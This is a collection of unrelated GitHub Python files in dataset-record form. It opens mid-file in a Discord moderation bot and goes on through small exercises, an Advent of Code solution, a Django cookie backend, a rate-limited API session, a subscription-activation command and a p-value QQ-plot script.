ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n if nomGroupe in BIND_NEW:\n for node in BIND_NEW[nomGroupe].getNodes():\n channelId, guildId = node.getLabel()\n del BIND_NEW[channelId]\n\n del BIND_NEW[nomGroupe]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n else:\n await ctx.message.add_reaction(\"❔\")\n\n #vocal role\n @bot.command(name = \"utils_vocalbind\")\n async def vocalbind(ctx, role: discord.Role, salonVocalId: int):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n\n if guildId not in VOCAL_ROLE:\n VOCAL_ROLE[guildId] = dict()\n\n VOCAL_ROLE[guildId][salonVocalId] = role.id\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n @bot.command(name = \"utils_vocalunbind\")\n async def vocalunbind(ctx, role: discord.Role):\n if not estAdmin(ctx.author.id): return\n\n guildId = role.guild.id\n roleId = role.id\n\n if guildId in VOCAL_ROLE:\n if roleId in VOCAL_ROLE[guildId].values():\n for salon in (x for x, y in VOCAL_ROLE.items() if y == roleId):\n del VOCAL_ROLE[guildId][roleId]\n\n await ctx.message.add_reaction(\"👌\")\n\n save()\n return\n\n await ctx.send(\"Inutile\")\n\n #autorole\n @bot.command(name = \"utils_autorole\")\n async def autorole(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str]):\n if ctx.author.guild_permissions.manage_roles or ctx.author.guild_permissions.administrator or estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n if (messageId, emojiHash) not in AUTO_ROLE:\n AUTO_ROLE[messageId, emojiHash] = role.id\n\n try:\n await message.add_reaction(emoji)\n except:\n pass\n await ctx.message.add_reaction(\"👌\")\n else:\n del 
AUTO_ROLE[messageId, emojiHash]\n await ctx.message.add_reaction(\"👌\")\n await ctx.message.add_reaction(\"❌\")\n\n try:\n await message.remove_reaction(emoji, bot.user)\n except:\n pass\n\n save()\n\n #autorole avec confirmation (sauf reconnaissance automatique)\n @bot.command(name = \"utils_autoroleconf\")\n async def autoroleconf(ctx, role: discord.Role, message: discord.Message, emoji: Union[discord.Emoji, str], channelConf: discord.TextChannel, pingConf: discord.Role, serveurAutoId: Optional[int], roleAutoId: Optional[int]):\n if estAdmin(ctx.author.id):\n emojiHash = emoji.id if isinstance(emoji, discord.Emoji) else emoji\n messageId = message.id\n\n AUTO_ROLE_CONF[messageId, emojiHash] = (role.id, channelConf.id, pingConf.id, serveurAutoId, roleAutoId, None)\n\n try:\n await message.add_reaction(emoji)\n await ctx.message.add_reaction(\"👌\")\n except:\n pass\n\n save()\n\n @bot.command(name = \"utils_autoroleconf_reset\")\n async def autoroleconfreset(ctx):\n if estAdmin(ctx.author.id):\n AUTO_ROLE_CONF.clear()\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n #fermeture ouverture d'un salon\n @bot.command(name = \"open\")\n async def open(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.remove(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"close\")\n async def close(ctx):\n if ctx.author.guild_permissions.administrator or ctx.author.guild_permissions.manage_messages:\n CLOSE.add(ctx.channel.id)\n save()\n await ctx.message.add_reaction(\"👌\")\n\n @bot.command(name = \"avatar\")\n async def avatar(ctx, someone: Optional[discord.User]):\n if someone is None:\n someone = ctx.author\n\n ref = discord.MessageReference(channel_id = ctx.channel.id, message_id = ctx.message.id)\n embed = discord.Embed()\n embed.set_image(url=someone.avatar.url)\n await ctx.send(embed=embed, reference = ref)\n\n\n @bot.command(name=\"redirMsg\")\n async def toto(ctx, guildId: int):\n guild = bot.get_guild(guildId)\n if guild:\n member = await guild.fetch_member(ctx.author.id)\n\n if member.guild_permissions.administrator:\n if guildId not in MODO:\n MODO[guildId] = ctx.channel.id\n else:\n del MODO[guildId]\n await ctx.message.add_reaction(\"👌\")\n\n save()\n\n return bot, TOKEN\n\nif __name__ == \"__main__\":\n bot, token = main()\n\n bot.run(token)\n","repo_name":"fabnem12/squadro-bot","sub_path":"discordUtils/discordutils.py","file_name":"discordutils.py","file_ext":"py","file_size_in_byte":30062,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"16"}
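The record above funnels every raw reaction through one normalising helper (traitementRawReact) before dispatching to the autorole/autopin/autoasso handlers. A minimal, self-contained sketch of that dispatch pattern, assuming discord.py 2.x; the prefix and the trailing comment's handler hand-off are placeholders, not taken from the original:

import discord
from discord.ext import commands

bot = commands.Bot(command_prefix="!", intents=discord.Intents.all())

@bot.event
async def on_raw_reaction_add(payload: discord.RawReactionActionEvent):
    # Ignore DMs and the bot's own reactions, as the original helper does.
    if payload.guild_id is None or payload.user_id == bot.user.id:
        return
    guild = bot.get_guild(payload.guild_id)
    member = await guild.fetch_member(payload.user_id)
    emoji_key = payload.emoji.id if payload.emoji.is_custom_emoji() else payload.emoji.name
    # ...hand (payload.message_id, member, guild, emoji_key) to each feature handler here.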
+{"seq_id":"31276111018","text":"def main():\n n = int(input())\n terms = []\n s = 0\n i = 1\n while s <= n:\n s += i\n terms.append(i)\n i += 1\n\n del terms[s - n - 1]\n print(len(terms))\n print(*terms)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"e1fe12/learn_python","sub_path":"p02/various_terms.py","file_name":"various_terms.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41667139670","text":"import math\n\ntop3elves = [0,0,0]\ntop3max = [0,0,0]\n\ncurrentSum = 0\ncurrentElf = 1\n\nwith open(\"day1-input.txt\", \"r\") as f:\n for line in f:\n\n if line.strip():\n currentSum += int(line)\n else:\n if currentSum > min(top3max) :\n top3elves[top3max.index(min(top3max))] = currentElf\n top3max[top3max.index(min(top3max))] = currentSum\n\n currentElf += 1\n currentSum = 0\n \n \n\nfinalAnswer=zip(top3elves,top3max)\n\nfor elf, cal in finalAnswer:\n print(f\"Elf {elf} has {cal} calories\")\n\nprint(f\"the total is {sum(top3max)}\")","repo_name":"MaryGz/adventCalendar2022","sub_path":"day1.2-solution.py","file_name":"day1.2-solution.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27217689095","text":"# import numpy\nimport numpy as np\n\n# set a random seed to replicate the results\nnp.random.seed(42)\n\n# import matplotlib to visualize the experiment\nimport matplotlib.pyplot as plt\n\n#When we repeat an experiment a large number of times, the average result will be very close to the expected result, i.e. in the long run, random events tend to average out at the expected value. \n#Example: Flipping a coin\n#If we flipped a coin just 10 times we would not be surprised to get 7 heads (even though the expected value is 5).\n#But if we flip it 10,000 times we are very unlikely to get 7,000 heads. The result will likely be within a few percent of 5,000.\n#Let's simulate this coin-flipping example with Python.\n\n\n# generate ten random numbers (0 or 1) with equal probabilities\ncoin_flips_10 = np.random.randint(0,2,10)\n\n# how many heads in 10 coin flips\ncount_heads = sum(coin_flips_10 == 1)\nprint(count_heads)\n\n# empty list used to store the results\nheads_ratio_nflips = []\n\n# generate integers from 5 to 10,000\nn_flips = np.arange(5,10000)\n\nfor flips in n_flips:\n # how many heads / flips\n heads_ratio = sum(np.random.randint(0,2,flips) == 1) / flips\n\n # append ratios\n heads_ratio_nflips.append(heads_ratio)\n \n # set plot size\nplt.figure(figsize=(10,8))\n\n# number of flips on the x axe and heads ratio on y axe\nplt.plot(n_flips, heads_ratio_nflips)\n\n# expected ratio\nplt.plot(n_flips, len(n_flips)*[0.5], 'r--')\n\n# plot settings\nplt.figure(figsize=(10,8))\nplt.xlabel('Flips')\nplt.ylabel('Heads ratio')\nplt.show()\n","repo_name":"RaghavanArun/lighthouse-python-fundamentals","sub_path":"prep_course_statistics-master/The Law of Large Numbers.py","file_name":"The Law of Large Numbers.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"22765037008","text":"try:\n import cPickle as pickle\nexcept ImportError:\n import pickle\n\nfrom .base import Backend\n\nfrom datetime import datetime, timedelta\n\nfrom backward import settings\n\n\nclass CookieBackend(Backend):\n def get_url_redirect(self, request):\n return request.COOKIES.get(settings.URL_REDIRECT_NAME, None)\n\n def save_url_redirect(self, request, response, url_redirect):\n self.set_cookie(request, response, url_redirect, cookie_name=settings.URL_REDIRECT_NAME)\n\n def get_next_action(self, request):\n if settings.NEXT_ACTION_NAME in request.COOKIES:\n return pickle.loads(request.COOKIES[settings.NEXT_ACTION_NAME])\n\n return {}\n\n def save_next_action(self, request, response, data):\n self.set_cookie(request,\n response,\n pickle.dumps(data, pickle.HIGHEST_PROTOCOL),\n cookie_name=settings.NEXT_ACTION_NAME)\n\n def delete_next_action(self, request, response):\n response.delete_cookie(settings.NEXT_ACTION_NAME, domain=self.get_cookie_domain(request))\n\n def set_cookie(self, request, response, value, cookie_name):\n max_age = settings.COOKIE_MAX_AGE\n\n expires = datetime.strftime(datetime.utcnow() + timedelta(seconds=max_age),\n \"%a, %d-%b-%Y %H:%M:%S GMT\")\n\n try:\n response.set_cookie(cookie_name,\n value,\n max_age=max_age,\n expires=expires,\n domain=self.get_cookie_domain(request),\n secure=settings.COOKIE_SECURE or None)\n except UnicodeEncodeError:\n return False\n\n return True\n\n def get_cookie_domain(self, request):\n cookie_domain = settings.COOKIE_DOMAIN\n\n if cookie_domain and cookie_domain.startswith('.'):\n host = '.'.join(request.get_host().split('.')[-2:])\n\n cookie_domain = cookie_domain % {\n 'host': host\n }\n\n return cookie_domain\n","repo_name":"thoas/django-backward","sub_path":"backward/backends/cookie.py","file_name":"cookie.py","file_ext":"py","file_size_in_byte":2093,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"16"}
+{"seq_id":"42948940811","text":"#Author: Sam Allan\n#Date of Last Revision: 05/20/2023\n#Script: Seattle Ops 301n3 challenge 09\n#Purpose: Create if statements using these logical conditionals below. Each statement should print information to the screen depending on if the condition is met.\n#!Equals: a == b\n#!Not Equals: a != b\n#!Less than: a < b\n#!Less than or equal to: a <= b\n#!Greater than: a > b\n#!Greater than or equal to: a >= b\n#!Create an if statement using a logical conditional of your choice and include elif keyword that executes when other conditions are not met.\n#!Create an if statement that includes both elif and else to execute when both if and elif are not met.\n#Stretch Goals (Optional Objectives)\n#Pursue stretch goals if you are a more advanced user or have remaining lab time.\n#!Create an if statement with two conditions by using and between conditions.\n#!Create an if statement with two conditions by using or between conditions.\n#!Create a nested if statement.\n#Create an if statement that includes pass to avoid errors.\n\n#Variables:\n#sit, storing where the user is sitting as an argument when the function is called.\n#chairs, storing the number of chairs the user has sat in as an integer in a variable.\n\n# MAIN\n#defining function sit_finder to try to find where you are sitting. It can only verify whether or not the user is sitting in a chair.\ndef sit_finder(sit):\n#if the user is sitting in a chair\n if sit == \"chair\":\n #give them a helpful reminder.\n print(\"you're sitting in a chair!\")\n #return the value true to be used later.\n return True\n #else, if they're sitting in something that does not equal a chair\n elif sit != \"chair\":\n #despair\n print(\"where on earth are you sitting?!\")\n #return False value to be used later\n return False\n#defining chair_number function to find how many chairs the user has sat in\ndef chair_number(chairs):\n #if they try to say a word instead of a number\n if isinstance(chairs, str):\n #feign confusion\n print(\"I don't know what you're talking about\")\n #return a 0 integer to be used when the function is called later.\n return 0\n #else if they've sat in fewer than 3 chairs\n elif chairs <= 3:\n #chastise them\n print(\"somebody loves standing\")\n #if they've sat in fewer than 20 chairs\n elif chairs < 20:\n #scold them\n print(\"that's not that many chairs\")\n #if it's greater than 90 chairs\n elif chairs >= 90:\n #make fun of the user\n print(\"whoa, ok, slow down chairmaster\")\n #if it's greater than 50 chairs\n elif chairs > 50:\n #be impressed\n print(\"whoa, buddy, that's a lot of chairs\")\n #if it's fewer than or equal to 50, unless one of the above conditions has already been met\n elif chairs <= 50:\n #be unimpressed\n print(\"ok, pretty average amount of chairs\")\n #otherwise\n else:\n #forget the topic\n print(\"I forgot what we were talking about.\")\n #return the integer value given by any of these conditions that is set off to the variable \"chairs\"\n return chairs\n#calling the function within a variable, asking for user input in the argument.\nsit = sit_finder(input(\"where are you sitting?\"))\n#storing user input in a variable to be used as an argument when the num_chairs function is called\nuser_input = input(\"how many chairs have you sat in?\")\n#if the contents of the user_input variable is a string, attempt to convert it to an integer. 
\ntry:\n user_input = int(user_input)\nexcept ValueError:\n # If the conversion fails, user_input will remain a string\n pass\n\n#setting another variable to house the function for use in the following two lines\nnum_chairs = chair_number(user_input)\n\n#if they have sat in more than 50 chairs and are currently sitting in a chair\nif num_chairs > 50 and sit:\n #deliver a helpful reminder.\n print(\"you are sitting in a chair, and have sat in more than 50 chairs.\")\n#if the number of chairs they've sat in is equal to 420 or 69\nif num_chairs == 420 or num_chairs == 69:\n #let them know they've been caught.\n print(\"I see what you did there.\")\n\n#if the number of chairs exceeds 1000 \nif num_chairs > 1000:\n #setting a variable to hold the method by which the user sat in so many chairs\n yikes = input(\"how on earth have you sat in so many chairs\")\n #try to see if their input was an integer\n try:\n # if it is an integer, it will be recognized as such henceforth.\n yikes = int(yikes)\n #setting variable to hold an explanation\n varibul = input(\"what are you talking about?\")\n #check to see if their explanation is an integer\n try:\n #if it is, it shall remain that way\n varibul = int(varibul)\n #let the user know you don't understand what's happening.\n print(\"you're insane.\")\n #if int conversion returns valueError(basically, if the input was a string)\n except ValueError:\n #accept explaination\n print(\"ok, I see what you mean.\")\n #same deal here, if the input was a string\n except ValueError:\n #if it is this specific string\n if yikes == \"chairs\":\n #diagnose the user\n print(\"you're insane.\")\n #if it is any other string\n else:\n #feign suspicion\n print (\"sus.\")\n#if number of chairs is less than 50 and the user is not sitting in a chair\nif num_chairs <50 and not sit:\n #go nuts\n print(\"wowowowowowowowowow\")\n #just trying to fit a pass in here somewhere.\nelse:\n pass\n\n# END","repo_name":"theSam1998/Seattle-Ops-301n3-Challenges","sub_path":"OpsChal09.py","file_name":"OpsChal09.py","file_ext":"py","file_size_in_byte":5612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27632904044","text":"import pandas as pd\nimport numpy as np\nimport os\nimport datetime\nimport shutil\nimport sys\n\n# ---- define the file paths\npackage_root = os.path.dirname(os.path.abspath(''))\nlibrary = os.path.join(package_root, 'photo_libraries')\n\n# ---- get database\ndf = pd.read_hdf(os.path.abspath('photo_database.h5'), 'input')\nif 'datetime' not in df.columns:\n raise Exception('database does not contain image metadata')\n\n# ---- check that the dates are valid\ncheck_dt = df[pd.notnull(df.datetime)]\ninvalid_dt = check_dt[(check_dt.datetime > datetime.datetime.today()) |\n (check_dt.datetime < datetime.datetime.utcfromtimestamp(0))].index\ndf.loc[invalid_dt, 'datetime'] = np.nan\n\n# ---- create the photo archive folder\nroot = os.path.join(package_root, 'photo_archive')\ntry:\n os.mkdir(os.path.join(root))\n print('created photo archive')\nexcept FileExistsError:\n pass\n\n# ---- create folders for files that do not have metadata\nfor file_type in df.file_type.unique():\n try:\n os.mkdir(os.path.join(root, file_type))\n print('created sub-folder for {}'.format(file_type))\n except FileExistsError:\n pass\n\n# ---- create folder for images that do no have metadata\ntry:\n os.mkdir(os.path.join(root, 'image', 'unknown'))\n print('created sub-folder for images without metadata')\nexcept FileExistsError:\n pass\n\n# ---- create folders for each unique year:\nif df.datetime.notnull().any():\n for year in df.datetime.dt.year.unique():\n if pd.notnull(year):\n try:\n os.mkdir(os.path.join(root, 'image', str(int(year))))\n print('created sub-folder: {}'.format(str(int(year))))\n except FileExistsError:\n pass\n\n# ---- create destination codes\ndef create_destinations(df):\n seed_since_epoch = int((datetime.datetime.now() - datetime.datetime.utcfromtimestamp(0)).total_seconds())\n rng = np.random.RandomState(seed_since_epoch)\n\n df['img_id'] = ['img_id_'+str(i).zfill(10) for i in rng.randint(0,1e10, len(df))]\n df['file_name'] = [df.filepath.loc[i][df.filepath.loc[i].rfind('/')+1:] for i in df.filepath.index]\n\n if df.datetime.notnull().any():\n df['file_name'] = np.where(pd.notnull(df.datetime), 'date_'+df.datetime.dt.strftime('%Y%m%d') + '_' + df.img_id + df.file_ext.str.lower(), df.file_name)\n\n destination = []\n for i in df.index:\n if pd.isnull(df.loc[i, 'datetime']):\n if df.loc[i, 'file_type'] == 'image':\n destination.append(os.path.join(root, df.loc[i, 'file_type'], 'unknown', df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'file_name']))\n else:\n destination.append(os.path.join(root, df.loc[i, 'file_type'], df.loc[i, 'datetime'].strftime('%Y'), df.loc[i, 'file_name']))\n df['destination'] = destination\n return df\n\n\n# ---- function to move the file\ndef move_file(idx, df):\n try:\n shutil.move(df.loc[idx,'filepath'], df.loc[idx, 'destination'])\n\n except PermissionError:\n raise PermissionError('permission error moving {} to {}'\\\n .format(df.loc[idx, 'filepath'], df.loc[idx, 'destination']))\n return\n\n\n# ---- function to check for duplicate names and add DUPLICATE if it is\ndef check_for_duplicate_file_name(idx, df):\n i = 1\n while os.path.exists(df.loc[idx, 'destination']):\n if pd.isnull(df.loc[idx, 'datetime']):\n if df.loc[idx, 'file_type'] == 'image':\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 'unknown', 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n 
'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n else:\n df.loc[idx, 'destination'] = os.path.join(root, df.loc[idx, 'file_type'],\n df.loc[idx, 'datetime'].strftime('%Y'),\n 'DUPLICATE{}_'.format(i) + df.loc[idx, 'file_name'])\n i += 1\n return df\n\n\n# ---- bring together the two functions above to move all of the images\ndef organize_files(df):\n for idx in df.index:\n # ---- make sure that the source file exists\n if not os.path.exists(df.loc[idx, 'filepath']):\n raise Exception('source file {} does not exist'.format(df.loc[idx, 'filepath']))\n else:\n df = check_for_duplicate_file_name(idx, df)\n move_file(idx, df)\n return df\n\n\ndf = create_destinations(df)\ndf = organize_files(df)\ndf.to_hdf('photo_database.h5', 'output')\n","repo_name":"alexdsbreslav/photo_organization","sub_path":"scripts/organize_files.py","file_name":"organize_files.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
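The duplicate handling above keeps prepending DUPLICATE{i}_ until the destination is free; the same idea in isolation with pathlib (a standalone sketch, not tied to the DataFrame, and the example path is hypothetical):

from pathlib import Path

def unique_destination(dest: Path) -> Path:
    # Prepend DUPLICATE1_, DUPLICATE2_, ... until the name is unused.
    candidate, i = dest, 1
    while candidate.exists():
        candidate = dest.with_name(f"DUPLICATE{i}_{dest.name}")
        i += 1
    return candidate

print(unique_destination(Path("photo_archive/image/2020/example.jpg")))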
+{"seq_id":"36273302500","text":"\"\"\"\nSession object used to maintain an open session with PTP\n\nAlmost entirely based off of session by kannibalox from their PTPAPI project on GitHub\n\nAuthor: Parker Timmerman\n\"\"\"\n\nimport logging\nimport requests\n\nfrom ptp_config import config\nfrom time import time, sleep\n\nLOGGER = logging.getLogger(__name__)\n\nclass TokenSession(requests.Session):\n \"\"\" Allow rate-limiting requests to a site \"\"\"\n\n def __init__(self, capacity, fill_rate):\n \"\"\" tokens is the total number of tokens in the bucket\n fill_rate is the rate in tokens/second that the bucket will be refilled.\n A request can be made when there are enough tokens in the bucket for the request \"\"\"\n\n requests.Session.__init__(self)\n self.capacity = float(capacity)\n self._tokens = float(capacity) # current tokens in bucket, start at capacity (full)\n self.consumed_tokens = 0\n self.fill_rate = float(fill_rate)\n self.timestamp = time()\n\n def consume(self, tokens):\n \"\"\" Consume tokens from the bucket. Returns True if there were enough tokens, otherwise False. \"\"\"\n\n self.update_tokens()\n if tokens < self._tokens:\n self._tokens -= tokens\n self.consumed_tokens += tokens\n LOGGER.debug(\"Consuming {0} token(s), total tokens consumed so far: {1}\".format(tokens, self.consumed_tokens))\n else:\n return False\n return True\n\n def request(self, *args, **kwargs):\n while not self.consume(1):\n LOGGER.debug(\"Waiting for token bucket to refull...\")\n sleep(1)\n return requests.Session.request(self, *args, **kwargs)\n\n def update_tokens(self):\n if self._tokens < self.capacity:\n now = time()\n delta = self.fill_rate * (now - self.timestamp)\n self._tokens = min(self.capacity, self._tokens + delta)\n self.timestamp = now\n return self._tokens\n\n tokens = (update_tokens)\n\n def base_get(self, url_path, *args, **kwargs):\n return self.get(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\n def base_post(self, url_path, *args, **kwargs):\n return self.post(config.get('Main', 'baseURL') + url_path, *args, **kwargs)\n\nLOGGER.debug(\"Initializing token session\")\nsession = TokenSession(3, 0.5)\nsession.headers.update({\"User-Agent\": \"Wget/1.13.4\"})\n","repo_name":"ParkMyCar/MovieManSpiff","sub_path":"ptp_api/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"18183014651","text":"\nimport json\nimport requests\n\nimport settings\nfrom constants import transactino_constants, model_constants, method_constants\nfrom util.input_args import input_args\nfrom util.get_path import get_path\nfrom util.make_headers import make_headers\nfrom util.check_for_announcements import check_for_announcements\n\nfrom .constants import subscription_constants\n\ndef activate(args):\n activate_args = input_args({\n subscription_constants.SUBSCRIPTION_ID: {\n method_constants.INPUT: 'Enter the Subscription ID to activate',\n method_constants.TYPE: str,\n },\n })\n\n payload = {\n transactino_constants.SCHEMA: {\n model_constants.MODELS: {\n model_constants.SUBSCRIPTION: {\n method_constants.METHODS: {\n subscription_constants.ACTIVATE: activate_args,\n },\n },\n },\n },\n }\n\n response = requests.post(\n settings.URL,\n headers=make_headers(),\n data=json.dumps(payload),\n )\n\n check_for_announcements(response)\n\n response_json = json.loads(response.text)\n activate_json = get_path(response_json, [\n transactino_constants.SCHEMA,\n model_constants.MODELS,\n model_constants.SUBSCRIPTION,\n method_constants.METHODS,\n subscription_constants.ACTIVATE,\n ])\n\n print(json.dumps(activate_json, indent=2))\n","repo_name":"NicholasPiano/transactino","sub_path":"jormungand/commands/subscription/activate.py","file_name":"activate.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"74277809927","text":"#!/usr/bin/env python\n# AUTHOR: William Stafford Noble\n# CREATE DATE: 16 March 2009\nimport sys\nimport os\nimport math\n\nusage = \"\"\"USAGE: make-qq-plot.py \n\nCompare a given set of p-values to the uniform distribution by\ncreating a QQ plot with log-log axes. The program outputs three\nfiles: a gnuplot script (.gnuplot), the data to be plotted\n(.txt) and the plot itself (.png). Note that the stored\nvalues are downsampled to avoid having too many points in the plot.\n\n\nOptions:\n --no-log-scale\n --column-header Header of column from which to get p-values.\n --minus-natural-log Input values are negative log base e.\n --format png|eps (default=png)\n --fontsize (only effective with \"-format eps\")\n --title \n\nIf the p-value file is specified as \"-\", then the program reads from\nstandard input.\n\n\"\"\"\n\n###############################################################################\n# Find a given word in a tab-delimited string of words.\n# Return the index.\ndef findWord(header, word):\n\n words = header.split(\"\\t\")\n for index in range(0, len(words)):\n if (words[index] == word):\n return(index)\n sys.stderr.write(\"Can't find %s in %s.\\n\" % (word, header))\n sys.exit(1)\n\n###############################################################################\n# MAIN\n###############################################################################\n\n# Set default values.\nlog_scale = 1\ncolumn_header = \"\"\nlog_values = 0\nfile_format = \"png\"\nfont_size = 24\ntitle = \"\"\n\n# Parse the command line.\nsys.argv = sys.argv[1:]\nwhile (len(sys.argv) > 2):\n next_arg = sys.argv[0]\n sys.argv = sys.argv[1:]\n if (next_arg == \"--no-log-scale\"):\n log_scale = 0\n elif (next_arg == \"--column-header\"):\n column_header = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--minus-natural-log\"):\n log_values = 1\n elif (next_arg == \"--format\"):\n file_format = sys.argv[0]\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--fontsize\"):\n font_size = int(sys.argv[0])\n sys.argv = sys.argv[1:]\n elif (next_arg == \"--title\"):\n title = sys.argv[0]\n sys.argv = sys.argv[1:]\n else:\n sys.stderr.write(\"Invalid option (%s).\\n\" % next_arg)\n sys.exit(1)\nif (len(sys.argv) != 2):\n sys.stderr.write(usage)\n sys.exit(1)\npvalue_filename = sys.argv[0]\nfileroot = sys.argv[1]\n\n# Open the file for reading.\nif (pvalue_filename == \"-\"):\n pvalue_file = sys.stdin\nelse:\n pvalue_file = open(pvalue_filename, \"r\")\n\n# If a header string was specified, find the relevant column.\nif (column_header != \"\"):\n header = pvalue_file.readline().rstrip()\n column_index = findWord(header, column_header)\n sys.stderr.write(\"Reading p-values from column %d.\\n\" % column_index)\nelse:\n column_index = 0\n\n# Read the p-values from the specified column.\npvalues = []\nnumZeroes = 0\nfor line in pvalue_file:\n line = line.rstrip()\n words = line.split(\"\\t\")\n\n # Skip comment lines.\n if (line[0] == \"#\"):\n continue\n\n # Crash if the line is too short.\n if (len(words) <= column_index):\n sys.stderr.write(\"Too few columns (%d < %d).\\n%s\\n\" \n % (len(words), column_index, line))\n sys.exit(1)\n\n # Skip NaNs.\n if ((words[column_index] == \"NaN\") or\n (words[column_index] == \"nan\")):\n continue\n\n pvalue = float(words[column_index])\n if (log_values):\n pvalue = math.exp(-1.0 * pvalue)\n\n # Count zero p-values.\n if (pvalue == 0):\n numZeroes += 1\n\n # Store this p-value.\n pvalues.append(pvalue)\n\npvalue_file.close()\nnum_pvalues = 
len(pvalues)\nif (numZeroes != 0):\n sys.stderr.write(\"Warning: Found %d zero p-values.\\n\" % numZeroes)\nsys.stderr.write(\"Read %d p-values from %s.\\n\" % (num_pvalues, \n pvalue_filename))\n\n# Sort the values.\npvalues.sort()\n\n# Open the data file.\ndata_filename = \"%s.txt\" % fileroot\ndata_file = open(data_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % data_filename)\n\n# We will only print with this density along the x-axis.\nif (log_scale):\n increment = 0.01\nelse:\n increment = 0.001\ncurrent_value = 0\n\n# Print the values to a file.\nrank = 1.0\nnum_printed = 0\nfor pvalue in pvalues:\n\n if (log_scale):\n new_value = math.log(rank / num_pvalues)\n else:\n new_value = rank / num_pvalues\n\n if (current_value == 0) or (new_value >= current_value + increment):\n data_file.write(\"%g\\t%g\\n\" % (rank / num_pvalues, pvalue))\n current_value = new_value\n num_printed += 1\n\n rank += 1.0\ndata_file.close()\nsys.stderr.write(\"Printed %d p-values.\\n\" % num_printed)\n\n# Find the first non-zero p-value.\nfor index in range(0, len(pvalues)):\n min_pvalue = pvalues[index]\n if (min_pvalue != 0):\n break\n\n# Set the range.\nsys.stderr.write(\"Minimum p-value=%g\\n\" % min_pvalue)\nif (1.0 / num_pvalues < min_pvalue):\n min_pvalue = 1.0 / num_pvalues\n sys.stderr.write(\"Minimum rank p-value=%g\\n\" % min_pvalue)\nif (min_pvalue == 0):\n min_value = \"1e-10\"\nelse:\n min_value = \"1e%d\" % (int(math.log(min_pvalue, 10.0)) - 1)\nsys.stderr.write(\"Minimum x-axis value=%s\\n\" % min_value)\n\n# Open the gnuplot file.\ngnuplot_filename = \"%s.gnuplot\" % fileroot\ngnuplot_file = open(gnuplot_filename, \"w\")\nsys.stderr.write(\"Creating %s.\\n\" % gnuplot_filename)\n\n# Print the gnuplot file.\ngnuplot_file.write(\"set output '/dev/null'\\n\")\nif (file_format == \"png\"):\n gnuplot_file.write(\"set terminal png\\n\")\nelif (file_format == \"eps\"):\n gnuplot_file.write(\"set terminal postscript eps %s\\n\" % font_size)\nelse:\n sys.stderr.write(\"Invalid file format (%s).\\n\" % file_format)\n sys.exit(1)\ngnuplot_file.write(\"set xlabel 'Rank p-value'\\n\")\ngnuplot_file.write(\"set ylabel 'Calculated p-value'\\n\")\ngnuplot_file.write(\"set xrange [%s:1]\\n\" % min_value)\ngnuplot_file.write(\"set yrange [%s:1]\\n\" % min_value)\nif (log_scale):\n gnuplot_file.write(\"set logscale xy\\n\")\nif (title != \"\"):\n gnuplot_file.write(\"set title '%s'\\n\" % title)\ngnuplot_file.write(\"plot x notitle with lines lt 1\\n\")\ngnuplot_file.write(\"replot 0.5*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot 2.0*x notitle with lines lt 2\\n\")\ngnuplot_file.write(\"replot '%s' notitle with points\\n\" % data_filename)\ngnuplot_file.write(\"set output\\n\")\ngnuplot_file.write(\"replot\\n\")\ngnuplot_file.close()\n\n# Make the image.\nsys.stderr.write(\"Creating %s.%s.\\n\" % (fileroot, file_format))\nos.system(\"gnuplot %s > %s.%s\" % (gnuplot_filename, fileroot, file_format))\n\n","repo_name":"crux-toolkit/crux-toolkit","sub_path":"test/calibration/make-qq-plot.py","file_name":"make-qq-plot.py","file_ext":"py","file_size_in_byte":6397,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"16"}
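The heart of the QQ plot is pairing the i-th smallest p-value with its uniform expectation i/n; that pairing in isolation, with synthetic p-values standing in for the input column:

import random

pvalues = sorted(random.random() for _ in range(1000))  # stand-in for the real p-value column
for rank, p in enumerate(pvalues[:5], start=1):
    expected = rank / len(pvalues)
    print(f"rank p-value {expected:.4f}\tcalculated p-value {p:.4f}")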
